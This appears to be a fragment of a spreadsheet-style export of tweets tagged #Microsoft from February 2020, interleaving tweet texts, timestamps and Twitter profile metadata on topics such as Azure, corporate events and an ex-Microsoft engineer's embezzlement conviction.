    <t>{'id': 3152466615, 'id_str': '3152466615', 'name': 'Leanne Spicer', 'screen_name': 'leannespicer1', 'location': 'South Florida', 'description': '#GuitarPlayer #Guitarist ðŸŽ¸#Music ðŸŽ¤ | #Bitcoin &amp; #Cryptocurrency Enthusiast | #InternetMarketer | Love is loveðŸ’•', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 3617, 'friends_count': 2840, 'listed_count': 563, 'created_at': 'Thu Apr 09 19:03:21 +0000 2015', 'favourites_count': 17055, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 12481,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'http://pbs.twimg.com/profile_images/1035217441964650496/3nGrSoA4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1035217441964650496/3nGrSoA4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3152466615/1492853466',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</si>
  <si>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10:45:12 +0000 2020</t>
  </si>
  <si>
    <t>It was fascinating seeing the closing keynote with Nick Wallace, Commercial Director at @Azure at #Oracle #OpenWorld #London.  He was discussing the compatibility with various software's. 
#OOWLON #Microsoft #migration #Azure #ERP #OracleContractors https://t.co/50Ry43GJ4T</t>
  </si>
  <si>
    <t>Thu Feb 27 10:45:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Connected Vehicle Platform: trends and investment areas
#AI #IA #automotive https://t.co/MNQ7jmkYEP</t>
  </si>
  <si>
    <t>Thu Feb 27 10:42:03 +0000 2020</t>
  </si>
  <si>
    <t>New #Azure Firewall certification and features in Q1 CY2020
#Microsoft #security #cybersecurity https://t.co/STdelmmv42</t>
  </si>
  <si>
    <t>Thu Feb 27 10:41:42 +0000 2020</t>
  </si>
  <si>
    <t>Along with @pluralsight, #Fujitsu are attempting to beat the record of 18,000 SkillsIQ tests taken in one day. Turns out I am a novice at #Cloud but proficient in #Microsoft Office. Hopefully our #FDEs fare better... https://t.co/7x41nwHQRy</t>
  </si>
  <si>
    <t>{'id': 903629326939279360, 'id_str': '903629326939279360', 'name': 'FDE', 'screen_name': 'Fujitsu_FDE', 'location': '', 'description': 'Fujitsu Distinguished Engineers. 250 FDEs &amp; Associate FDEs. 10 Fellows. 15 Countries.', 'url': 'https://t.co/vJqZPh8xSf', 'entities': {'url': {'urls': [{'url': 'https://t.co/vJqZPh8xSf', 'expanded_url': 'http://www.fujitsu.com/uk/innovation/fujitsu-distinguished-engineers/', 'display_url': 'fujitsu.com/uk/innovation/â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 381, 'friends_count': 330, 'listed_count': 5, 'created_at': 'Fri Sep 01 14:43:14 +0000 2017', 'favourites_count': 4842, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1333,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'http://pbs.twimg.com/profile_images/904710677343940608/FaSOJ7mI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/904710677343940608/FaSOJ7mI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/903629326939279360/1572870120',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</si>
  <si>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10:40:28 +0000 2020</t>
  </si>
  <si>
    <t>@DiskelLtd  We have a proven track record of successfully delivering IT solutions across a broad range of industries throughout the UK.  Find out more - https://t.co/fYOwFul7bd  
#itsupport #business #software #ERP #CRM #Microsoft #Opera3 #CustomerSuccess https://t.co/SuxQeSjQGY</t>
  </si>
  <si>
    <t>{'id': 487392468, 'id_str': '487392468', 'name': 'Diskel Limited', 'screen_name': 'DiskelLtd', 'location': 'UK , International', 'description': 'London based UK wide IT solutions provider. Dynamics365, Pegasus Accounts Specialists, VOIP, security software and more - sales@diskel.co.uk I https://t.co/SDAym6O40T', 'url': 'http://t.co/FhFEQ6KfMJ', 'entities': {'url': {'urls': [{'url': 'http://t.co/FhFEQ6KfMJ', 'expanded_url': 'http://www.diskel.co.uk', 'display_url': 'diskel.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/SDAym6O40T', 'expanded_url': 'http://www.diskel.co.uk', 'display_url': 'diskel.co.uk', 'indices': [143, 166]}]}}, 'protected': False, 'followers_count': 80, 'friends_count': 370, 'listed_count': 0, 'created_at': 'Thu Feb 09 09:44:53 +0000 2012', 'favourites_count': 171, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 219,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'http://pbs.twimg.com/profile_images/1214219328209477632/E78B9EYy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214219328209477632/E78B9EYy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/487392468/1583427896',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</si>
  <si>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10:40:26 +0000 2020</t>
  </si>
  <si>
    <t>The US-based Consumer Technology Association (@CTATech) has developed the first ever accredited standard for use of artificial intelligence in health care, with input from tech giants such as #Amazon, #Microsoft, and #Google https://t.co/6R5G2IwHw9</t>
  </si>
  <si>
    <t>{'id': 27254739, 'id_str': '27254739', 'name': 'pharmaphorum', 'screen_name': 'pharmaphorum', 'location': 'London, England', 'description': 'pharmaphorum uses content to connect the pharmaceutical industry &amp; other innovators to advance healthcare. Publishing-Consulting-Creative. PT=Paul Tunnah tweet.', 'url': 'https://t.co/qBuzfdtc00', 'entities': {'url': {'urls': [{'url': 'https://t.co/qBuzfdtc00', 'expanded_url': 'https://pharmaphorum.com/about/', 'display_url': 'pharmaphorum.com/about/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 18887, 'friends_count': 3341, 'listed_count': 941, 'created_at': 'Sat Mar 28 16:12:42 +0000 2009', 'favourites_count': 4373, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 56780, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '214FF2', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/893437018683969536/KNCE8GMU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/893437018683969536/KNCE8GMU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/27254739/1501600478', 'profile_link_color': '207C43',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</si>
  <si>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Thu Feb 27 10:35:34 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> I would just like to draw everyone's attention to this brilliant new blog by educator, #MIEExpert &amp;amp; #DigiLearnSector Co-ordinator @cgerrard02 "Empowering all with #Microsoft Learning Tools"  @microsofteduk https://t.co/7DJKtnpOhp #edtech #collaboration #altc #MicrosoftEDU</t>
  </si>
  <si>
    <t>{'id': 865887202814943234, 'id_str': '865887202814943234', 'name': 'Chris Melia #edtech', 'screen_name': 'ChrisLearnTech', 'location': 'North West, England', 'description': 'Senior Learning Technologist @UCLan â€¢ @MicrosoftEDU Learning Consultant in UK â€¢ #DigiLearnSector Lead â€¢ @AdvanceHE Fellow â€¢ PGCert #DigitalEd @uoe_online', 'url': 'https://t.co/ydQZjhuEDb', 'entities': {'url': {'urls': [{'url': 'https://t.co/ydQZjhuEDb', 'expanded_url': 'https://uclan.ac.uk/digilearnsector', 'display_url': 'uclan.ac.uk/digilearnsector', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1167, 'friends_count': 902, 'listed_count': 20, 'created_at': 'Sat May 20 11:09:31 +0000 2017', 'favourites_count': 8527, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2756,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'http://pbs.twimg.com/profile_images/1229873382960791552/xK-XLH37_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229873382960791552/xK-XLH37_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/865887202814943234/1581431516',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</si>
  <si>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10:34:50 +0000 2020</t>
  </si>
  <si>
    <t>This 'study' may be deeply flawed because they bothered assessing no projects other than those that #Microsoft controls (what about projects that don't use Git and Microsoft's proprietary trap?) 
https://t.co/dsexW7McpO #deleteGithub</t>
  </si>
  <si>
    <t>Thu Feb 27 10:30:50 +0000 2020</t>
  </si>
  <si>
    <t>India plans to change IT Laws; new laws to include data and identity theft, says IT &amp;amp; Communication minister. #india #IT #TechNews #technology #Microsoft #Dubai #BigData #cybercrime #ArtificialIntelligence  https://t.co/oAwtzAktAr https://t.co/1ijvtT6Rte</t>
  </si>
  <si>
    <t>Thu Feb 27 10:30:37 +0000 2020</t>
  </si>
  <si>
    <t>Big Changes #Microsoft Has Made in the Release Of #.NET #Core - https://t.co/erjQx14A2Z</t>
  </si>
  <si>
    <t>{'id': 454787832, 'id_str': '454787832', 'name': 'Linda Hudson ðŸ’«', 'screen_name': 'LindaHudsonUSA', 'location': 'USA', 'description': "Professional SEO/SMO Expert &amp; Consultant. Love to share informative tweets with my network. Let's Keep in touch on #FB: https://t.co/Hv0uawSMf9", 'url': 'https://t.co/JJlznbCtKn', 'entities': {'url': {'urls': [{'url': 'https://t.co/JJlznbCtKn', 'expanded_url': 'http://myvigour.com/', 'display_url': 'myvigour.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/Hv0uawSMf9', 'expanded_url': 'https://www.facebook.com/LindaHudsonUSA', 'display_url': 'facebook.com/LindaHudsonUSA', 'indices': [120, 143]}]}}, 'protected': False, 'followers_count': 1449, 'friends_count': 1563, 'listed_count': 152, 'created_at': 'Wed Jan 04 11:29:15 +0000 2012', 'favourites_count': 1575, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 35209,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'http://pbs.twimg.com/profile_images/477372754472087552/KKv3qDsu_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/477372754472087552/KKv3qDsu_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/454787832/1408524100', 'profile_link_color': 'FF691F',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</si>
  <si>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Thu Feb 27 10:30:20 +0000 2020</t>
  </si>
  <si>
    <t>What legal services do you need? We've got you covered with expert advice, rapid contract review and timely negotiation https://t.co/IeWKTjz5Zs #LegalAdvice #Microsoft https://t.co/HHEZ1E8GBf</t>
  </si>
  <si>
    <t>Thu Feb 27 10:30:00 +0000 2020</t>
  </si>
  <si>
    <t>#Seattle District #Court found #Microsoft ex-tester Volodymyr #Kvashuk guilty of organizing a fraudulent scheme using #crypto. 
#fraud #crime #Bitcoin #BTC #cryptocurrency #blockchain 
https://t.co/6H7N0YXaKm</t>
  </si>
  <si>
    <t>{'id': 1113065270539476994, 'id_str': '1113065270539476994', 'name': 'Blockchain Today', 'screen_name': 'BlockchainTD', 'location': 'United States', 'description': 'Stay up-to-date about most recent news on #blockchain, #cryptocurrency, #ICO, and everything related to the #crypto world.', 'url': 'https://t.co/mzihSFAfil', 'entities': {'url': {'urls': [{'url': 'https://t.co/mzihSFAfil', 'expanded_url': 'https://blockchaintd.com', 'display_url': 'blockchaintd.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 468, 'friends_count': 721, 'listed_count': 1, 'created_at': 'Tue Apr 02 13:06:55 +0000 2019', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 511,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'http://pbs.twimg.com/profile_images/1218363935683989504/nG19Iarf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1218363935683989504/nG19Iarf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1113065270539476994/1579922479', 'profile_link_color': '019E9F',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</si>
  <si>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Building an #Image Processor Using #Microsoft #Bot Framework by Hari Haran cc @CsharpCorner https://t.co/HcCItMeamm https://t.co/N9LGENPN39</t>
  </si>
  <si>
    <t>Thu Feb 27 10:26:19 +0000 2020</t>
  </si>
  <si>
    <t>#techfect20
Because knowledge has beginning but no ending... 
#tech #technology #Tech4All #techno #technews #tech4wildlife #TechTrends #Microsoft @Microsoft @MicrosoftEDU https://t.co/bdXee09t7H</t>
  </si>
  <si>
    <t>Thu Feb 27 10:21:55 +0000 2020</t>
  </si>
  <si>
    <t>A U.S. court has found a former #Microsoft software #Engineer guilty of embezzling #Millions of dollars and turning it into #Bitcoin to fund a life of luxury. 
Volodymyr Kvashuk, 25, was convicted Tuesday by ...
 #Crime #BitcoinMixers #ExMicrosoft
https://t.co/fkwt6ViR3f https://t.co/OgXUYZ1rD5</t>
  </si>
  <si>
    <t>{'id': 169137367, 'id_str': '169137367', 'name': 'ðŸ’¥ðŸ’¥ðŸ’¥ðŸ’¥ðŸ’¥ðŸ”­ðŸ¤–â“µâ’·â“Šâ“‹ðŸŒŽðŸ“¡ðŸ’¥ðŸ’¥ðŸ’¥ðŸ’¥ðŸ’¥', 'screen_name': '_1BUV', 'location': ' ðŸŒŽ â¤ï¸ï¸ à¹€t à¹Ð³ lÑ”à¸„×©Ñ” à¹€t ðŸ’«ðŸ‘½', 'description': '24/7 ðŸ…†ðŸ„¾ðŸ…ðŸ„»ðŸ„³ ðŸ„½ðŸ„´ðŸ…†ðŸ…‚ ðŸ”Š   #Corruption #Coverups #Dogmas #Eco #Energy #Money #Politics #Protests  #Space #Time #War #WFB', 'url': 'https://t.co/vc8Vg64Cb9', 'entities': {'url': {'urls': [{'url': 'https://t.co/vc8Vg64Cb9', 'expanded_url': 'http://1BUV.COM', 'display_url': '1BUV.COM', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3105, 'friends_count': 3249, 'listed_count': 17, 'created_at': 'Wed Jul 21 16:51:57 +0000 2010', 'favourites_count': 2603, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 41518, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '050500', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1210991006/radarSmCLR_normal.gif', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210991006/radarSmCLR_normal.gif', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/169137367/1582222690', 'profile_link_color': 'ABB8C2', 'profile_sidebar_border_color': 'F23B03', 'profile_sidebar_fill_color': '050400', 'profile_text_color': 'F7140D', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 10:19:02 +0000 2020</t>
  </si>
  <si>
    <t>Quite regular I see search terms like this hit my blog, "NSG vs ASG" in Azure etc - have a look at this blog post
https://t.co/VktIut1TJR
#microsoft #azure #azurefamily https://t.co/q7zYqpicUG</t>
  </si>
  <si>
    <t>Thu Feb 27 10:18:45 +0000 2020</t>
  </si>
  <si>
    <t>India will benefit in the long run-------&amp;gt;#Google, #Microsoft shift production from China to SE Asia due to virus. https://t.co/5sAf05JaQa</t>
  </si>
  <si>
    <t>{'id': 246921491, 'id_str': '246921491', 'name': 'Debasish Paul Choudhury', 'screen_name': 'DPCPV', 'location': 'Delhi NCR Area, INDIA', 'description': 'Head - ELCINA Bhiwadi Electronics Cluster SPV, Ex President - SEMI India, Make in India Aficionado, Art Lover, Avid Politics Watcher. Views mine, RTs not.', 'url': 'https://t.co/3xWi8zlEG9', 'entities': {'url': {'urls': [{'url': 'https://t.co/3xWi8zlEG9', 'expanded_url': 'http://www.elcinaclusters.in/clusters-greenfield-bhiwadi.asp', 'display_url': 'elcinaclusters.in/clusters-greenâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 470, 'friends_count': 688, 'listed_count': 59, 'created_at': 'Thu Feb 03 18:50:00 +0000 2011', 'favourites_count': 17577, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9801,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'http://pbs.twimg.com/profile_images/675996558752538624/XCbtdpvn_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/675996558752538624/XCbtdpvn_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/246921491/1479810212',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</si>
  <si>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10:16:32 +0000 2020</t>
  </si>
  <si>
    <t>Is morale among #Microsoft's #Mixer team is at an all-time low?!
This story and so much more on today's episode of  #TheScoop
@Graham_Day
@WeveGotBibinho
LIVE NOW: https://t.co/u4YVeAIQkM https://t.co/VXEGzSsP9C</t>
  </si>
  <si>
    <t>Thu Feb 27 10:15:05 +0000 2020</t>
  </si>
  <si>
    <t>Have you tried Microsoft Teams yet? You can get everyone involved in a project together. Then share and edit files, hold meetings, and chat. #gamechanger #Microsoft #teams https://t.co/JhMCE3KCrE</t>
  </si>
  <si>
    <t>{'id': 2425951238, 'id_str': '2425951238', 'name': 'Ingenio Technologies', 'screen_name': 'Ingenio_Tech', 'location': 'Brighton', 'description': 'Brighton based managed IT support, cyber-security, Office 365, cloud computing â€“ all delivered with exceptional customer service.', 'url': 'https://t.co/W7ZjWFeyKe', 'entities': {'url': {'urls': [{'url': 'https://t.co/W7ZjWFeyKe', 'expanded_url': 'https://www.ingeniotech.co.uk/', 'display_url': 'ingeniotech.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2167, 'friends_count': 4762, 'listed_count': 37, 'created_at': 'Thu Apr 03 17:30:51 +0000 2014', 'favourites_count': 387, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1821,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'http://pbs.twimg.com/profile_images/946691222017593349/pZ5JR57W_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/946691222017593349/pZ5JR57W_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2425951238/1579867981', 'profile_link_color': '824192',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</si>
  <si>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10:15:00 +0000 2020</t>
  </si>
  <si>
    <t>In March, 5 new locations around the World for the Global #HPE #Microsoft #Hybridcloud Summit Roadshow 2020: #Cairo #Lisboa #Dubai #Mexico and #Boston : get more info and secure your seat at https://t.co/IdMGI7xESb
#HPEMSFT @renggli_Urs @B_Hallmans @mamajoamato @TREnterpriseVP https://t.co/2V0B4FpqEk</t>
  </si>
  <si>
    <t>Thu Feb 27 10:12:59 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft have provided updates for their plans to implement modern authentication for Office 365 services. Users should be conscious of the type of Outlook clients being used as some do not support this latest standard. 
https://t.co/3id3JN5QFR
#authentication #Microsoft</t>
  </si>
  <si>
    <t>{'id': 258491772, 'id_str': '258491772', 'name': 'Transputec Ltd', 'screen_name': 'Transputec', 'location': 'London, UK', 'description': 'International award-winning IT Services and Solutions company based in London, Dubai, India and Manila.', 'url': 'http://t.co/ZUHNvwiKj5', 'entities': {'url': {'urls': [{'url': 'http://t.co/ZUHNvwiKj5', 'expanded_url': 'http://www.transputec.com', 'display_url': 'transputec.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4419, 'friends_count': 1426, 'listed_count': 25, 'created_at': 'Sun Feb 27 21:06:39 +0000 2011', 'favourites_count': 275, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2076, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0A0A0A', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1154682666119258117/CzjV0lZq_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1154682666119258117/CzjV0lZq_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/258491772/1579693772', 'profile_link_color': '11C5F2',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</si>
  <si>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10:10:33 +0000 2020</t>
  </si>
  <si>
    <t>#Policyregulation #Crime #IRS #Microsoft #BitcoinMixers Ex-Microsoft Engineer Used Bitcoin to Help Embezzle Millions From Tech Giant https://t.co/MA8FeSp660 https://t.co/FsiVILff5l</t>
  </si>
  <si>
    <t>{'id': 780792121431199745, 'id_str': '780792121431199745', 'name': 'European Chamber of Digital Commerce', 'screen_name': 'Juchtervbergen', 'location': 'Schiphol-Rijk, Haarlemmermeer', 'description': 'The European Chamber of Digital Commerce is your hub for the top developments in Digitalization and Fintech.\n\nR.A.U. Juchter van Bergen Quast, CEO', 'url': 'https://t.co/PPryFw7i8N', 'entities': {'url': {'urls': [{'url': 'https://t.co/PPryFw7i8N', 'expanded_url': 'http://www.europeanchamberofdigitalcommerce.com', 'display_url': 'europeanchamberofdigitalcommerce.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2124, 'friends_count': 154, 'listed_count': 14, 'created_at': 'Tue Sep 27 15:32:02 +0000 2016', 'favourites_count': 1415, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 42068,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'http://pbs.twimg.com/profile_images/1118111458812944384/F4TT4I6m_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1118111458812944384/F4TT4I6m_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/780792121431199745/1559661574',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</si>
  <si>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Ex-Microsoft Engineer Used Bitcoin to Help Embezzle Millions From Tech Giant https://t.co/MvQNYbtcgQ #Policyregulation #Crime #IRS #Microsoft #BitcoinMixers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</si>
  <si>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8203, 'friends_count': 8945, 'listed_count': 38, 'created_at': 'Tue Nov 06 20:50:01 +0000 2018', 'favourites_count': 328, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 139714,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</si>
  <si>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10:08:44 +0000 2020</t>
  </si>
  <si>
    <t>TMR Consulting organizing a lot of Sessions for deep information on Business Central, answer for your industry. Join today for more information! Register Now: https://t.co/fuQJlLfOSf
#ERP #Microsoft #Dynamics #MicrosoftDynamics365 #Dyn365 #event #trainingsession #businesscentral https://t.co/49YZvyLKbY</t>
  </si>
  <si>
    <t>Thu Feb 27 10:06:38 +0000 2020</t>
  </si>
  <si>
    <t>Good morning from Ireland! We're kicking off our Love Cloud: Communicate - Business Voice event at Microsoft's Dublin office #LoveCloudCommunicate #BusinessVoice #microsoft https://t.co/0LlKs7LSeo</t>
  </si>
  <si>
    <t>{'id': 705077486737039360, 'id_str': '705077486737039360', 'name': 'Vuzion', 'screen_name': 'vuzioncloud', 'location': 'United Kingdom', 'description': 'A value-add cloud aggregator &amp; Microsoft CSP Indirect Partner, helping resellers, SIs &amp; ISVs build long-term, future-proof &amp; profitable cloud-based businesses.', 'url': 'https://t.co/PnLQgAi3RU', 'entities': {'url': {'urls': [{'url': 'https://t.co/PnLQgAi3RU', 'expanded_url': 'http://www.vuzion.cloud', 'display_url': 'vuzion.cloud', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1026, 'friends_count': 2274, 'listed_count': 73, 'created_at': 'Wed Mar 02 17:09:07 +0000 2016', 'favourites_count': 1690, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2543,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'http://pbs.twimg.com/profile_images/890519013524197376/pMR1V2o6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/890519013524197376/pMR1V2o6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/705077486737039360/1554364548',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</si>
  <si>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10:05:13 +0000 2020</t>
  </si>
  <si>
    <t>Ex-Microsoft Engineer Used #bitcoin to Help Embezzle Millions From Tech Giant - CoinDesk #Crime #IRS #Microsoft #BitcoinMixers https://t.co/GopnatQICg https://t.co/B3faLF7hLA</t>
  </si>
  <si>
    <t>{'id': 2281314234, 'id_str': '2281314234', 'name': 'BitcoinAgile', 'screen_name': 'bitcoinagile', 'location': "Matter Doesn't Matter", 'description': 'Breaking News. Bitcoin, Blockchain &amp; Beyond. #bitcoin #blockchain #ethereum #cryptocurrency #crypto #trading #TA #charts $btc $eth', 'url': 'https://t.co/0PAI4x0LoK', 'entities': {'url': {'urls': [{'url': 'https://t.co/0PAI4x0LoK', 'expanded_url': 'http://bitcoinagile.com', 'display_url': 'bitcoinagile.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 52314, 'friends_count': 13144, 'listed_count': 7218, 'created_at': 'Tue Jan 07 23:52:46 +0000 2014', 'favourites_count': 2924, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 956087,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'http://pbs.twimg.com/profile_images/902617531109617665/-5e-1IJw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/902617531109617665/-5e-1IJw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2281314234/1422172470', 'profile_link_color': 'E66A3F',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</si>
  <si>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10:04:06 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft warns that Windows revenue won't meet its expectations due to Covid-19 #Microsoft #Windows10 #Covid19 https://t.co/UhWB36qqCw https://t.co/HONLfGDc55</t>
  </si>
  <si>
    <t>Thu Feb 27 10:02:04 +0000 2020</t>
  </si>
  <si>
    <t>Ready to scale!! Nice overview of our story with the interview of our co-founder and CEO @DavidKeribin  conducted by @msft4startupsfr
#microsoft #partnership #digitalsignage 
https://t.co/VGhOBdUYZs</t>
  </si>
  <si>
    <t>{'id': 1291501860, 'id_str': '1291501860', 'name': 'Cenareo', 'screen_name': 'Cenareo', 'location': 'Paris, France', 'description': 'Make a scene! #Affichagedynamique #retail #Digitalisation #DigitalSignage #SaaS #DooH\nContext-based Digital Signage Software', 'url': 'https://t.co/qanM2lZGf5', 'entities': {'url': {'urls': [{'url': 'https://t.co/qanM2lZGf5', 'expanded_url': 'http://www.cenareo.com', 'display_url': 'cenareo.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1072, 'friends_count': 946, 'listed_count': 60, 'created_at': 'Sat Mar 23 13:58:31 +0000 2013', 'favourites_count': 1019, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1228,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'http://pbs.twimg.com/profile_images/1148851053707845633/F3_-nxUV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148851053707845633/F3_-nxUV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1291501860/1548888318', 'profile_link_color': '000032', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'EFEFEF', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 10:01:34 +0000 2020</t>
  </si>
  <si>
    <t>One week to go until our first #Microsoft technology update of 2020.
Discover whats next on the identity management Azure AD roadmap. Sign up now so you don't miss out:
https://t.co/xzZD1GwDAh</t>
  </si>
  <si>
    <t>Thu Feb 27 10:00:24 +0000 2020</t>
  </si>
  <si>
    <t>Fileless attack detection for Linux in preview https://t.co/rbShj5Hi7m #Azure #Microsoft #Security</t>
  </si>
  <si>
    <t>Thu Feb 27 09:57:30 +0000 2020</t>
  </si>
  <si>
    <t>Last call for our webinar tomorrow!
Perfect if you're working on #Windows10, #WaaS &amp;amp; Modern #EndpointManagement strategies, our 30min webinar discusses best practice in desktop/device management
Find out more: https://t.co/0tPjv3uTIv
#devicemanagement #microsoft #cybersecurity https://t.co/32es0ze24w</t>
  </si>
  <si>
    <t>Thu Feb 27 09:56:17 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Identity Manager is the best solution for businesses looking to secure their #IAM processes.
To find out more about #MIM, check out our #blog. 
#Microsoft #IdentityManagement #AccessManagement
https://t.co/wzfYlj0oxF https://t.co/r3Hx9wOc5K</t>
  </si>
  <si>
    <t>Thu Feb 27 09:54:47 +0000 2020</t>
  </si>
  <si>
    <t>#techjobs ALERT - International IT Business Solutions company seeks Senior #Microsoft #Support Engineer (Cape Town); 4-6 yrs work experience, 5 yrs in #engineering function ~ https://t.co/So3xLGIfmO ~ #TakeAction https://t.co/ylEDix3Q83</t>
  </si>
  <si>
    <t>{'id': 322636248, 'id_str': '322636248', 'name': 'IT-Online', 'screen_name': 'ITOnlineSA', 'location': 'South Africa', 'description': "One of South Africa's leading IT publications and websites.", 'url': 'http://t.co/WTKljdJf0T', 'entities': {'url': {'urls': [{'url': 'http://t.co/WTKljdJf0T', 'expanded_url': 'http://www.it-online.co.za', 'display_url': 'it-online.co.za', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2504, 'friends_count': 1244, 'listed_count': 405, 'created_at': 'Thu Jun 23 14:11:22 +0000 2011', 'favourites_count': 4023, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 22663,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'http://pbs.twimg.com/profile_images/1475809517/ITonlineNewLogo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1475809517/ITonlineNewLogo_normal.jpg',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</si>
  <si>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09:52:15 +0000 2020</t>
  </si>
  <si>
    <t>Finance Event #Microsoft #LinkedIn #MicrosoftAdvertising. Learning from our expertises from LinkedIn and Microsoft https://t.co/J6aPNlzd1T</t>
  </si>
  <si>
